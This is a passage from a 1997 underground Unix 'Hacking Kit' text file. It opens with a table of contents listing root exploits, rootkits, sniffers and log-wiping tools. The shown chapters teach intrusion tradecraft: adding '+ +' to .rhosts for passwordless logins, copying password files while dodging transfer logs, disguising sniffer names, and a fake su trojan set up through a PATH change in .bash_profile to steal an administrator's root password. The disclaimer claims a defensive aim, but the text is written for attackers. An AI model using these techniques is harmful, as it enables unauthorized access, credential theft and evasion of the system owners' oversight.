home *** CD-ROM | disk | FTP | other *** search
/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / Unix-Hacking-Documents / hackkit-2.0b.txt < prev    next >
Text File  |  2003-06-29  |  537KB  |  12,242 lines

  1.  
  2. THIS PAPER CONTAINS .C CODE - MAKE SURE TO TURN WORD WRAP OFF! In your editor!!
  3. AND DO NOT SAVE ANY CHANGES TO THIS FILE IF ASKED....
  4.  
  5. Unix Utils
  6. Linux/BSD/SySV/SunOS/IRIX/AIX/HP-UX
  7.  
  8. Hacking Kit v1.0.c Jan/97
  9. Hacking Kit v2.0.b March/97  (this is an update)
  10.  
  11.   By: Invisible Evil
  12.  IRC: #unixhacking #virus #hackers #virii #hacking #hacker
  13.       #hack is just to busy for me ;)
  14. NICK: i-e
  15.  
  16. If you have any other exploits, bugs, sniffers or utils that are not in here
  17. please mail them to ii@dormroom.pyro.net. And I will be sure to keep you
  18. updated with the latest version of this toolkit.
  19.  
  20. Comments are welcome.  Sys admin's that want to keep their system clean are
  21. welcome to request the latest version.
  22.  
  23. If you are looking for perfect grammar or spelling please put this file in
  24. your circular file.  I put enough time into this and just put it through
  25. a cheap spell check.
  26.  
  27. Whats new?  Look for more info on tricks of the trade, and nfs mounting
  28. drives to gain access to shells.  I am sure you will like the additions.
  29. I have added a login trojan, in.telnetd trojan, and some more scripts for
  30. scanning machines for mountable drives.  Have pun!
  31.  
  32.  
  33. I will add a (*)  to  u p d a t e d  s e c t i o n s.
  34.  
  35.  
  36. Contents:
  37.  
  38. Disclaimer
  39. Preface
  40.  
  41. Chapter I - Unix commands you need to know
  42.  
  43.     1A. Basic commands
  44.         Getting back to your home directory
  45.         getting into a user home directory easy
  46.         how to see what directory you are in now
  47.         How to get a complete manual for each command
  48.     1B. Telnet
  49.         Unix file permissions
  50.         Unix groups
  51.         How to change permissions and groups
  52.     1C. Rlogin
  53.         .rhosts
  54.         How to setup a .rhost file to login without a password
  55.     1D. FTP
  56.         Logging in to the site, but never out of the site.
  57.         Using prompt, hash, and, bin
  58.         Using get, put, mget, and, mput
  59.     1E. GCC (unix compiler)
  60.         How to get the file to the hack box without uploading it
  61.         How to copy files to your home directory easy
  62.         How to compile .c programs
  63.         How to name them what you want
  64.         How to load programs in the background while you log off
  65.         Looking at your process with ps
  66.  
  67. Chapter II - Getting started (your first account)
  68.  
  69.     2A. Cracking password files
  70.         How to get hundreds of accounts with your first hacked account
  71.         Why you only really need one password cracked on a system
  72.         How to get the root password from the admin, on an non-exploit system
  73.         Using A fake su program
  74.         Doc's for the fake su program
  75.         How to find the admin's
  76.         How to read .bash_history
  77.         Cracker Jack - A good password cracker
  78.         How to use crackerjack
  79.         Word Files
  80.         What you will need to get started
  81.         Hashing the word files
  82.       * Hash file for use with cracker jack and your word list
  83.       * Hash file for use with cracker jack and your passwd file
  84.     2B. Talking to newbe's
  85.         How to find the newbe's
  86.         How to get the newbe's passwords
  87.     2C. The hard way
  88.         Using finger @
  89.         What could the password be?
  90.         Getting more info from finger
  91.         a small .c file to use if you get on
  92.         Writing a small perl script to do the work for you.
  93.         How to get a domain list of all domains from rs.internic.net
  94.         A perl script to rip the domains & put them in a sorted readable list
  95.         How to execute the perl script
  96.  
  97.   * 2D. Using mount to gain access to unix systems
  98.       * What is nfs mount
  99.       * What you need to get started
  100.       * How to check a system to see if you can mount their drives
  101.       * A script to scan for systems that are nfs mountable
  102.       * How to mount the system
  103.       * How to unmount the system
  104.       * A Live Demo
  105.       * Mounting the drive
  106.       * Viewing the user directories
  107.       * Editing the local machine's passwd file
  108.       * How to put a .rhosts file in one on thier users directories
  109.       * How to rlogin to the users account
  110.  
  111. Chapter III - Getting password files
  112.  
  113.     3A. PHF
  114.         What is phf
  115.         Using lynx or netscape to access phf
  116.         Finding the user id the victims httpd (www) is running under
  117.         How to see if you are root using phf
  118.         How to cat the password file using phf
  119.         Backing up the victims password file
  120.         Changing a users password using phf
  121.         Restoring the old passwords
  122.         A .c file that will let you pipe commands to phf from your shell
  123.         How to use the phf shell file
  124.         Another way to use phf - text by quantum
  125.         Quantum's bindwarez file
  126.         A perl script that will try EVERY domain on the internet and log
  127.         root access and snatch passwd files for you all day in the background.
  128.         Doc's for the pearl script above
  129.         Getting accounts from /var/?/messages
  130.         A script to get the passwords for you if you can access /var/?/messages
  131.     3B. Newbe's
  132.         Lammer's
  133.     3C. Getting shadow passwd files
  134.         What is a shadow passwd
  135.         Getting the shadow file without root access
  136.         A .c file to cat any file without root access
  137.     3D. Getting /etc/hosts
  138.         Why get /etc/hosts
  139.  
  140. Chapter IV - Getting the root account
  141.  
  142.        What to do if you can't get root on the system
  143.    4A. Bugs
  144.        Intro
  145.    4B. Exploits
  146.        The umount/mount exploit
  147.        What are SUID perm's
  148.        The umount .c file
  149.        How to compile umount.c
  150.        The lpr Linux exploit
  151.        The lpr Linux .c exploit file
  152.        The lpr BSD .c exploit file
  153.        How to use lpr
  154.        Watch the group owners with lpr
  155.        Just use lpr for first root, then make a SUID shell
  156.        How to make the SUID root shell for future root access (root root)
  157.        The splitvt exploit
  158.        The splitvt exploit .c program
  159.        How to use the splitvt exploit program
  160.        The sendmail 8.73 - 8.83 root exploit shell script
  161.        How to use the sendmail exploit to get root access
  162.  
  163.  
  164. Chapter V - Making yourself invisible
  165.  
  166.        Keeping access
  167.    5A. Zap2 (for wtmp/lastlog/utmp)
  168.        Fingering the host before login
  169.        How to login and stay safe
  170.        How to configure Zap2
  171.        Finding the log file locations
  172.        The zap.c file
  173.    5B. Other scripts
  174.        The wted wtmp editor
  175.        Command line usage for wted
  176.        How to chmod the wtmp.tmp file
  177.        How to copy the wtmp.tmp to the wtmp file
  178.        Setting the path for the wtmp file in wted
  179.        The wted.c file
  180.        Cleaning the lastlog file using lled
  181.        Command line options for lled
  182.        How to use lled
  183.        How to chmod the lastlog.tmp file
  184.        How to copy the lastlog.tmp file to lastlog
  185.        Setting the path for the lastlog file in lled
  186.        The lled.c file
  187.      * A good perl script for editing wtmp, utmp, and, checking processes
  188. Chapter VI - Cleaning the log files
  189.  
  190.    6A. A walk around in a hacked system - let's login
  191.        Logging on the system
  192.        Watching for admin's
  193.        Nested directories
  194.        Having your root file ready
  195.        Becoming invisible
  196.        Greping the log directory
  197.        Cleaning the logs
  198.        Lets sniff the network
  199.        Editing your linsniffer.c
  200.        Looking at the processes running
  201.        Compiling and naming your sniffer program
  202.        Starting a sniff session
  203.        Changing group file access
  204.        Making a suid root shell trojan for uid=0 gid=0 every time
  205.        Naming your trojan
  206.        Touching the files date
  207.        Checking the sniffer log file
  208.        Setting the history files to null
  209.      * Using unset for the history files
  210.    6B. messages and the syslog
  211.        How to find the logs are by reading /etc/syslog.conf
  212.        How to see if there are logs in hidden directories
  213.        How to see if logs are being mailed to user accounts
  214.        How to see if logs are going to another machine
  215.      * How to edit syslog.conf to hide logins
  216.      * Restarting syslogd
  217.        How to see if there is a secret su log by reading /etc/login.defs
  218.    6C. The xferlog
  219.        How to edit the xferlog
  220.        How to grep and edit the www logs
  221.        How to look for ftp logs
  222.      * Other ways to edit text logs
  223.      * Using grep -v
  224.      * A script to rip text lines from these logs
  225.      * Restarting syslogd
  226.    6D. The crontabs
  227.        How to find and read the root or admin's cron
  228.        How to see if MD5 is setup on the machine
  229.        What is MD5
  230.  
  231. Chapter VII - Keeping access to the machine
  232.  
  233.    7A. Tricks of the trade
  234.        When the system admin has found you out
  235.        What to expect from the admin
  236.        History files
  237.        Nested directories
  238.        Placing trojans
  239.        Hidden directories
  240.        Making new commands (trojans)
  241.        Adding or changing passwd file entry's
  242.        Setting some admin accounts with null passwords
  243.        The best way to add an account
  244.        Editing a null account so you can login
  245.        Installing more games or exploitable programs
  246.        How to know your admin's
  247.        Reading system mail (with out updating pointers)
  248.        What to look for in the mail directories
  249.        A program to read mail without updating pointers
  250.    7B. Root kits and trojans
  251.        What are root kits
  252.        What are Demon kits
  253.        What do trojans do
  254.  
  255.  
  256. *********************************************************
  257. * Appendix I - Things to do after access                *
  258. *********************************************************
  259.   The a-z checklist
  260.  
  261. *********************************************************
  262. * Appendix II - Hacking / Security WWW / ftp sites      *
  263. *********************************************************
  264.  
  265. *********************************************************
  266. * Appendix III - More exploits for root or other access *
  267. *********************************************************
  268.  
  269. A3-01. Vixie crontab buffer overflow for RedHat Linux
  270. A3-02. Root dip exploit
  271. A3-03. ldt - text by quantumg
  272. A3-04. suid perl  - text by quantumg
  273. A3-05. Abuse Sendmail 8.6.9
  274. A3-06. ttysurf - grab someone's tty
  275. A3-07. shadow.c  - Get shadow passwd files
  276. A3-08. Abuse Root Exploit (linux game program)
  277. A3-09. Doom (game) root exploit - makes suid root shell
  278. A3-10. dosmenu suid root exploit
  279. A3-11. Doom root killmouse exploit
  280. A3-12. Root exploit for resize icons
  281. A3-13. Root console exploit for restorefont
  282. A3-14. Root rxvt X server exploit
  283. A3-15. Root wuftpd exploit
  284. A3-16. A shell script called gimme, used to read any system file
  285.  
  286. *********************************************************
  287. * Appendix IV - Other UNIX system utilities             *
  288. *********************************************************
  289.  
  290. A4-01. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX
  291. A4-02. invisible.c  Makes you invisible, and works on some SunOS without root
  292. A4-03. SySV Program that makes you invisible
  293. A4-04. UNIX Port scanner
  294. A4-05. Remove wtmp entries by tty number or username
  295. A4-06. SunOS wtmp editor
  296. A4-07. SunOS 4+ Zap your self from wtmp, utmp and lastlog
  297.  
  298.  
  299. *********************************************************
  300. * Appendix V - Other Unix Exploits                      *
  301. *********************************************************
  302.  
  303. A5-01. HP-UX Root vhe_u_mnt exploit
  304. A5-02. IRIX Root mail exploit
  305. A5-03. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX
  306. A5-04. IRIX mail exploit to make you any user on the machine - BUT NOT root
  307. A5-05. BSD - crontab root exploit
  308.  
  309. *********************************************************
  310. * Appendix VI - UUENCODED FILES                         *
  311. *********************************************************
  312.  
  313. 1. Quantum's Bindwarez binary file for PHF
  314. 2. Demon Root Kit - Includes: Banish, DemonPing, DemonSu, DemonTelnet
  315. 3. Linux Root Kit - Includes: Login, Netstat, and, PS
  316. 4. The Fake SU Program
  317.  
  318. **********
  319. Disclaimer
  320. **********
  321.  
  322. True this manual will aid hackers into breaking into systems but it is also
  323. provided to guide system admin's on different security problems and help
  324. with things to watch for on their system to keep hackers off.
  325.  
  326. If you use this manual to gain access to any system where you do not belong,
  327. and do any type of damage, you alone will suffer for your stupid actions!
  328.  
  329. I am not telling you to break into any system, I am just showing some of
  330. my experience, and things that I would do if I was to break into my own system.
  331.  
  332. This is for information only.....
  333. ISP's Secure Your Systems!
  334.  
  335. *******
  336. Preface
  337. *******
  338.  
  339. Ok, lets get started.  If you are going to hack, you must be doing this for a
  340. reason.  All hackers have their reasons for doing what they do.  Most are just
  341. hungry to learn.  Most of what I have learned about unix, i have learned on
  342. some service providers or someone else's machine.  I am one for the 'hands on'
  343. experience.  There is much to learn and you would have to read 20,000 books
  344. just to get what you would learn out of a few config files, a few admin email
  345. messages, some .bash_history files, and some poking around a few systems.
  346.  
  347. Here in this manual you should learn how to be the 'complete hacker' and come
  348. up with a style of your own.  It will not take to long, but it will take some
  349. practice and experience before you will be able to call yourself a hacker.
  350.  
  351. Not just anyone that can crack a password file, and log into a unix machine
  352. can call themselves a hacker.  Ok, you can get root access to a box!  You still
  353. are not a hacker!  You need to know why you are a hacker first, and then have
  354. your 'code' and 'style'.  You need a purpose and a reason for hacking into any
  355. box.  The true hacker knows why he is doing what he does, and is doing it for
  356. reasons like knowledge, free information, and ACCESS. The true hacker will
  357. turn one hack into access to many different systems and providers and keep this
  358. access for future learning and more FREE information.
  359.  
  360. The wan-a-be hacker will not be invisible, and will do many stupid things like:
  361. delete or corrupt data, down the machine, run bots or irc clients from root
  362. accounts or machines Give the passwords he cracked to everyone in the world
  363. to prove they can hack. Or they might just do stupid things that will get
  364. themselves cought.  I think sometimes this is done purposely just to draw
  365. attention to themselves so they can get cought and make the announcement that
  366. they are a hacker, and they were here!  A real hacker needs no such glory,
  367. he just needs the access and wants to keep it and be invisible! He will not
  368. tell many friends about the system, he will not give out the passwords or
  369. accounts, he will keep others off so he can continue his access there and
  370. keep it clean.
  371.  
  372. Here in this manual i hope that i can add enough style so that you can have
  373. real heart in this matter and and be a good clean hacker.
  374.  
  375. Happy hacking ...
  376.  
  377. --------------------------------
  378. Chapter I
  379.  
  380. Unix commands you need to know.
  381. --------------------------------
  382.  
  383. There are just a few basic commands you need to learn, and then some unix
  384. programs that will aid you in logging in logging into or keeping access to
  385. the machine.
  386.  
  387. Call your local internet service provider and ask them to sell you a shell
  388. account so that you will have something to practice on to learn these
  389. basic commands.  The average shell account might cost you $10.00 per month
  390. if you don't already get one with your existing account.
  391.  
  392. --------------
  393. Section 1A
  394.  
  395. Basic commands
  396. --------------
  397.  
  398. I hope you have a basic knowledge of DOS, that would help a bit, and I will
  399. assume that you already do in writing this manual.
  400.  
  401. DOS Commands you are used to first:
  402.  
  403. REMEMBER: unix is case sensitive, so if I here use lower case you must also,
  404. if I use a space you must also.  DOS will let you get away with allot of things
  405. but unix will not!
  406.  
  407. DIR/W      = ls
  408. DIR        = ls -l
  409. DIR/AH     = ls -al  AH=(hidden) -al=(include hidden files as well as regular)
  410. RENAME     = mv
  411. ATTRIB     = chmod
  412. MD         = mkdir
  413. RD         = rmdir
  414. DEL        = rm
  415. COPY       = cp
  416.  
  417. These are the basic commands, i suggest that you lookup the man pages
  418. on each one of these commands from your unix shell.  You would do this by
  419. typing 'man command' without the ''.
  420.  
  421. each one of these commands will have switches for them, like cp -R to copy
  422. files and directories.  So you would type man cp to get all of the switches
  423. you can use with the copy command.
  424.  
  425. cd {then press enter} will always take you to your home directory
  426. cp filename $HOME will copy the file to your home directory
  427. cd ~username will take you to that users home dir if you have access to be
  428.    there
  429. pwd {press enter} will show you what directory you are in.
  430.  
  431. -------------
  432. Section 1B
  433. Telnet
  434. -------------
  435.  
  436. Telnet is a command that you can use from a shell account, or from an exe
  437. file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems
  438. that will let you connect to another machine on the net.  There are other
  439. programs you will learn about here like FTP, and rlogin that you can use as well
  440. but now we will use telnet.
  441.  
  442. You can use telnet if you know the IP address or the host name you want to
  443. connect or login to.  To use the command you would just use the telnet program
  444. to connect to the IP or host like this:
  445.  
  446. Telnet netcom.com  or  telnet 206.146.43.56
  447.  
  448. Ok, now lets login:
  449.  
  450. telnet machine.com
  451.  
  452. trying .....
  453.  
  454. Connected to machine.com
  455.  
  456. Linux 2.0.28 (machine.com) (ttyp0)
  457.  
  458. machine login:username
  459. password:#######
  460.  
  461. bash$
  462.  
  463. Your prompt might look different, but we will use this one.
  464.  
  465. Notice above that it will tell you the O/S when you get the login prompt.
  466. You can use this if you get a large collection of passwd files.  Even before
  467. going on to crack them sort them by O/S types by just telnet-ing to them to
  468. see what they are running.  There are other ways, but lets keep this telnet
  469. topic going for a sec... telnet domain.name.com, after you see what they are
  470. running make a note of this and ctrl ] to break out of the connection.
  471.  
  472. Put all of your linux passwd files into a pile to be cracked first.  All we
  473. need is one account that works for the system, and we can be almost sure
  474. we will have root on that machine!  There are way to many holes in linux to
  475. think we will not be able to own one of those machines, so lets get to work so
  476. we can start this wonderful world of hacking.
  477.  
  478. ----------------------
  479. Unix File Permissions
  480. ----------------------
  481.  
  482. bash$
  483.  
  484. bash$ cd /tmp
  485. bash$ ls -l
  486. total 783
  487. -rwx------   1 wood     users           1 Jan 25 18:28 19067haa
  488. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  489. -rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
  490. -rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
  491. drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens
  492.  
  493. First notice that we used a / and not \ to change to the tmp directory! Unix
  494. uses the / as the root so it is backwards from DOS here.
  495. Notice we did ls -l for the long directory. If we did 'ls' we would have what
  496. you see below.
  497.  
  498. bash$ ls
  499. 19067haa      filter.14428  pop3a13598    pop3a13600    screens
  500.  
  501. With what we see here can not tell much, so most of the time we will be
  502. using ls -al with the -al we will see the hidden files also, hidden
  503. files and directories will always start with a '.'.  Now watch:
  504.  
  505. bash$ ls -al
  506. total 794
  507. drwxrwxrwt   4 root     root         8192 Jan 25 23:05 .
  508. drwxr-xr-x  22 root     root         1024 Dec 28 18:07 ..
  509. -rw-r--r--   1 berry    users           6 Jan 25 23:05 .pinetemp.000
  510. drwxr-xr-x   2 berry    users        1024 Jan 25 23:05 .test
  511. -rwx------   1 wood     users           1 Jan 25 18:28 19067haa
  512. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  513. -rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
  514. -rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
  515. drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens
  516.  
  517. .pinetemp.000 is a hidden file, and .test is a hidden directory.
  518.  
  519. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  520.  
  521. row 1          row2     row3
  522. ----------------------------
  523.  
  524. Now here we need to learn about permissions, users, and groups.
  525.  
  526. Row #1 is the file permissions
  527. Row #2 is who owns the file
  528. Row #3 is the group owner of the file
  529.  
  530. File permissions are grouped together into three different groups.
  531. If the line starts with a d, it is a directory, if there is no d, it is a file.
  532.  
  533. - --- --- ---
  534. | |   |   |--------> Other = anyone on the machine can access
  535. | |   |------------> Group = certain groups can access
  536. | |----------------> User  = only the owner can access
  537. |------------------> Directory Mark
  538.  
  539.  
  540.  
  541. - rw- r-- r--
  542. | |   |   |--------> Other can only read the file
  543. | |   |------------> Group can only read the file
  544. | |----------------> User  can read or write to the file
  545. |------------------> It is not a directory
  546.  
  547.  
  548. - rwx rwx r-x
  549. | |   |   |--------> Other can read and execute the file
  550. | |   |------------> Group can read write and execute the file
  551. | |----------------> User  can read write and execute the file
  552. |------------------> It is not a directory
  553.  
  554.  
  555. The owner is the user name in row #2 and the group owner is the name in row #3.
  556. In DOS the file has to have a .exe, .com, or .bat extension to execute, but in
  557. unix all you need is the --x in your group of user, other, group
  558.  
  559. You can change these permissions if you own the file or have root access:
  560.  
  561. ---------------------------------------------------------------------------
  562. chmod oug+r filename will make all three groups of permissions be able to
  563. read the file.
  564.  
  565. chmod og-r filename would make the file readable only to the user that owns
  566. the file.  (notice the - or + to set the file yes or no)
  567.  
  568. chmod +x filename would make the file execute by all.
  569.  
  570. chown username filename would make the file owned by another user.
  571. chgrp groupname filename would make the file owned by another group.
  572. ---------------------------------------------------------------------------
  573.  
  574. Make sure to keep file perm's and groups the same or you will be sniffed
  575. out and booted from the system.  Changing configs on the system might only
  576. break other functions, so keep your paws off or you are just asking to get
  577. cought.  Only do what you are *SURE* of.  Only use commands that you know,
  578. you might find yourself spending hours fixing just one typo like
  579. chown -R username /* could keep you busy for a year ;)
  580.  
  581. Just be careful!
  582.  
  583. We will get into this stuff more as we go into the needs for this.
  584.  
  585. ------------------
  586. Section 1C Rlogin
  587. ------------------
  588.  
  589. There is another command you might use and we will get into this elsewhere
  590. as we get into using rlogin to login to a system without a password.
  591.  
  592. For now read the man pages on rlogin by using the man rlogin from your
  593. shell account.
  594.  
  595. The basic command would be :
  596.  
  597. rlogin -l username hostname
  598. connecting....
  599. password:
  600.  
  601. bash$
  602.  
  603. Rlogin requires the user to have a file in their home directory that tells
  604. what system they can receive the rlogin from.  In this file .rhosts it would
  605. look like this:
  606.  
  607. username hostname (or) hostname
  608.  
  609. if you were to add to this file   + +   it would let any user from any host
  610. login without a password.
  611.  
  612. The file would look like this:
  613.  
  614. ----- cut here ------
  615. + +
  616. _____ cut here ------
  617.  
  618. if they already had entry's you could add the + + under their host names, but
  619. remember now they would notice seeing they would now be able to rlogin
  620. without the password.  You would be targeting people that did not
  621. already have a .rhosts file.
  622.  
  623. ---------------
  624. Section 1D FTP
  625. ---------------
  626.  
  627. Another way to login will be FTP.  You can use a windows client, or just
  628. login from a shell.
  629.  
  630. ftp ftp.domain.com
  631.  
  632. This will allow you to download or upload files to the site you are hacking.
  633. Just make sure to edit the xferlog (see section 6d) to wipe your tracks
  634. on the system.  Remember NEVER to ftp or telnet out of the hacked system, only
  635. log into it!  If you are coming from your own system, or from another hacked
  636. account you might just be giving your login and password to the system admin
  637. or another hacker on their system.  There could be a telnetd or ftpd trojan
  638. loaded on the system, or even a sniffer.  Now you would have just gave someone
  639. your login id and password.  And if this was the system admin, he might have
  640. the idea that revenge is sweet ;)
  641.  
  642. Using ftp from the shell, I would suggest using a few commands:
  643.  
  644. After you login, and have your prompt, type these commands
  645. pressing enter after each one.
  646.  
  647. prompt
  648. hash
  649. bin
  650.  
  651. prompt will allow you to type a command like (mget *) or (mput*) and transfer
  652. an entire directory without having it prompt you for each file yes or no.
  653.  
  654.                hash marks
  655. hash will put ############ on the screen so you can see the transfer
  656. is still moving and at what speed.
  657.  
  658. bin will make sure you get the files in the right mode, and if transferring
  659. binary files, you will be sure they will uncompresses.
  660.  
  661. The transfer commands are easy, get filename, or, put filename, or for many
  662. files you can use regular wild cards with mput  or mget.
  663.  
  664. --------------------
  665. Section 1E
  666. GCC compiler
  667. --------------------
  668.  
  669. There will be a time when you will need to compile a .c file.
  670.  
  671. It is best to compile on the machine you are working on.  So upload or copy
  672. and past the files to the hacked box and compile them there.  If you have
  673. problems with their compiler you can try to upload pre-compiled files.
  674.  
  675. One way to get the file up to the victims machine would be to use copy
  676. and paste.  Get a good tsr or windows shareware program to do this if
  677. you do not have any way to do it now.  You can copy a script file from
  678. one window and paste it into an editor on the victims machine, and then compile
  679. the new file.  Walaa... no upload log of the file.  You can copy and paste
  680. from the victims machine as well so that there are no download logs of ascii
  681. files.
  682.  
  683. To copy and paste you can just open an editor on the hacked box, and then copy
  684. from your other session, and paste your script into the editor and save the
  685. file.  This way there will not be anything in the xferlog yet.
  686.  
  687. You can do the same thing with the password file.  If you do decide to
  688. download the password file using ftp, make sure to copy it to your home
  689. directory first under a different name.
  690.  
  691. bash:/etc:> cp passwd $HOME/plog  would copy the file called passwd from the /etc
  692. directory you were in, to your home directory in a file called plog instead of
  693. passwd.  Admin's grep the xfer logs looking for who is downloading the passwd
  694. file.
  695.  
  696. Another way to get file to or from the box without showing up in the logs
  697. would be to open an irc session on the victims machine, then from your other
  698. session where you are already a user on irc, send the files using dcc.
  699.  
  700. The command to send the files would be /dcc send <nick> <filename>
  701. The command to get the file on the other side would be /dcc get <nick> <file>
  702.  
  703. It would be nice if you had a bot loaded on the irc when you were hacking so
  704. that you could just send files to the bot and have it auto receive them.
  705.  
  706. A 'bot' is a robot program that you can load in the background on your shell
  707. account that will receive files, keep channels open, etc...
  708.  
  709.  
  710. The GCC compiler is easy...
  711.  
  712. gcc filename.c -o filenameyouwant
  713.  
  714. If i was to compile a file called z2.c that would zap the log files i would
  715. type this:
  716.  
  717. gcc z2.c -o zap
  718.  
  719. This would give me a file that would exe, called zap
  720.  
  721. If I just typed : gcc z2.c  I would have a file named a.out, that was the executable
  722. file and would have to rename it to zap, or some name i would know by doing
  723. this: mv a.out zap
  724.  
  725. Now I would have a file named zap that was executable instead of a.out.
  726.  
  727. You will want to make sure you are not naming these files names that sys admin's
  728. will know.  If you had a sniffer file called 'linuxsniffer.c' you don't
  729. want to keep the same name ;) call it something like:
  730.  
  731. gcc linuxsniffer.c -o lsn
  732.  
  733. Remember also sometimes you can execute these files names right in the directory
  734. by just typing the file name like for our 'lsn' (sniffer) above just by
  735. typing lsn.  But sometimes this will not work unless you add a ./ to the
  736. command.  So remember, sometimes you will need to type ./lsn  or your file
  737. name.
  738.  
  739. Also there will be a time you will want a program to run in the background
  740. even after you logoff.  Like in the case of the sniffer above.  In this case
  741. you might want to name your sniffer something that would not be so easy
  742. noticed.  Use your own style here.  BUT to make it stay in the background while
  743. you are off the system you need to run the command with a & after the command.
  744.  
  745. lsn&
  746.  
  747. If you were to just type lsn, your screen would pause, and you would not be
  748. able to type while the program was sniffing, but if you typed lsn& it would
  749. load and the system prompt would come right back to you.  Also the system
  750. would let you know it was loaded by giving you the process id # that it
  751. was loaded as.
  752.  
  753. You could view the process with the ps -x command, you might want to run
  754. ps -auxe |more
  755.  
  756. a= all
  757. u= show user
  758. x= yours
  759. e= env
  760.  
  761. some machines
  762. f=tree
  763. or command: pstree
  764.  
  765. ------------------------------------
  766. Chapter II
  767. Getting started (your first account)
  768. ------------------------------------
  769.  
  770. There are many ways to get a starter account. I will go into each area to
  771. help you get started.  All you need is one good account to spawn off to
  772. hundreds of accounts.  Think of this; You get one good exploitable system,
  773. most any linux machine ;)
  774.  
  775. Now you get root access and load a sniffer program.  The TCP sniffer will
  776. search out any login process on the network and log the login and password
  777. for any telnet, ftp, or dial-in session going out or coming into the system.
  778.  
  779. Now even if it is a small ethernet connection you have around 100 passwords
  780. for a few machines or domains.  If a larger net provider you have hundreds
  781. of accounts all over the world!  All you need for this is one good account
  782. and password to an exploitable system.  If it seems you can not exploit
  783. root on the system, this might be a good system to crack passwords on and
  784. exchange the accounts for other accounts from hackers or irc users that are
  785. looking to load a bot but do nt have the shell account or disk space to do
  786. it.  NEVER give out even one password to a system you exploited root on.
  787. Keep these systems to yourself!
  788.  
  789. Lets now get into ways to get your first accounts.
  790.  
  791. ------------------------
  792. Section 2A.
  793. Cracking passwd files
  794. ------------------------
  795.  
  796. If you are hacking with the right frame of mind, you will run the crack
  797. program until you get one good account that will let you into the system.
  798.  
  799. You will login and see if you can exploit root on the system, if so, get root,
  800. get the files you need to use into your nested directory, and erase your
  801. presence, and clean all of the logs.  Now you are ready to load your sniffer.
  802.  
  803. Why go on hacking passwords for a system that within 24 hours you will have
  804. most of the passwords anyway?  Not only for the machine you just hacked, but
  805. other machines that were connected to as well.  If the system is not
  806. exploitable don't even waste your time on it, go on to the next.  At a latter
  807. date if you want to crack passwords for accounts to trade go ahead.
  808.  
  809. If you get an admin's account cracked you might want to read his history files,
  810. and see if he is using the su command to access root allot.  If he is you can
  811. use an su trojan on him.  This will get you the root password.  This works like
  812. this:  You change his shell script so that a hidden directory (.term) is good,
  813. is set in the search path before all other directories.  You put a fake su
  814. binary in the .term (or other) directory.  He types su, everything looks good
  815. to him, he types in the root password when prompted, the password id copied to
  816. a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a
  817. password error telling him to try again.  He thinks he must have done something
  818. wrong and runs su again, but this time the real one and logs in.
  819.  
  820. You will find this fake su program in the last appendix named uuencoded files.
  821.  
  822. Here are the docs:
  823.  
  824. Fake SU by Nfin8 - i-e
  825.  
  826. IRC: /msg i-e
  827.  
  828. Easy as 1,2,3 ...
  829.  
  830. 1. Change the path in one of the user accounts that you have access to that
  831. you see is using SU from reading their history files, to hit a path first
  832. that you have placed the su trojan file into.  .term or .elm is good!
  833.  
  834. 2. Make sure to edit the top of the su.c file to the path you will be using
  835. so that the sutrojan will delete isself and let the real SU work for the
  836. second try.
  837.  
  838. 3. Put all of the files in the target directory and compile the su.c file.
  839.  
  840. gcc su.c -o su
  841.  
  842. Then delete all of the files but the su.  All done!
  843.  
  844. .bash_profile might look like this:
  845.  
  846. # .bash_profile
  847.  
  848. # Get the aliases and functions
  849. if [ -f ~/.bashrc ]; then
  850.         . ~/.bashrc
  851.                 fi
  852.  
  853. # User specific environment and startup programs
  854.  
  855. PATH=$PATH:$HOME/bin
  856. ENV=$HOME/.bashrc
  857. USERNAME=""
  858.  
  859. export USERNAME ENV PATH
  860.  
  861. You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin
  862.  
  863.  
  864. When the sys admin run's 'SU' it will run the SU-trojan in the .term
  865. directory first and report that the password he typed was wrong, the
  866. Trojan su program would have put a hidden file in the /tmp directory for
  867. you that contains the root password (or account passwd) typed.  If it was
  868. an account rather then the root password it will let you know the account
  869. name. Then the trojan su program deletes itself so that the next try will
  870. get the real su program.
  871.  
  872.  
  873. You can find the admin's at the top section of the passwd file in the /etc
  874. directory.  Just type :  more passwd
  875.  
  876. You can be sure that the first two real accounts made in the passwd file are
  877. admin's, also sometimes you can find others by where their directories are
  878. located in the password file.  Like /staff/username.
  879.  
  880. The history files are in each users account directory.  You can read these to
  881. see what the last commands were that were typed by the user.  Sometimes as
  882. much as the last 100+ commands.  Look for the file .bash_history, or History,
  883. you can read these using more.  command: more .bash_history, or most times to
  884. keep your typing you can type : more .b*  (or) just type : more .b (and then
  885. hit the tab key on your keyboard).
  886.  
  887. Ok so now you need a good password cracking program. You can see in the next
  888. chapter on how to get password files from systems that you do not have an
  889. account on, but it is catch 22, you need the password cracking program too.
  890.  
  891. There are three things that you will need.
  892.  
  893. 1. Password cracking program
  894. 2. Good word files
  895. 3. Password files
  896.  
  897. The best password cracking program to start would be crackerjack.  You can
  898. search the web and find this easy as 1,2,3.  Download it and you are ready
  899. to go.  If you are a bit more advanced you can download a cjack for unix and run
  900. it in a shell.  But if you are just getting started get the DOS/OS/2 version.
  901.  
  902. Also search for some good word files.  The best word files are the names.
  903. You will find that most unsecured passwords out there are guy's girlfriends
  904. names, of girls boyfriends names ;)  You will find word files like
  905. 'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
  906. hackersdict' and other like these to be the best.
  907.  
  908. Load crackerjack like this:
  909.  
  910. [D:\jack]jack
  911.  
  912. Cracker Jack version 1.4 for OS/2 and DOS (386)
  913. Copyright (C) 1993, The Jackal, Denmark
  914.  
  915. PWfile(s) : domain.com.passwd
  916.  
  917. Wordfile  : domain.com.passwd
  918.  
  919. Like above run the password file as the wordfile first.  This will get you all
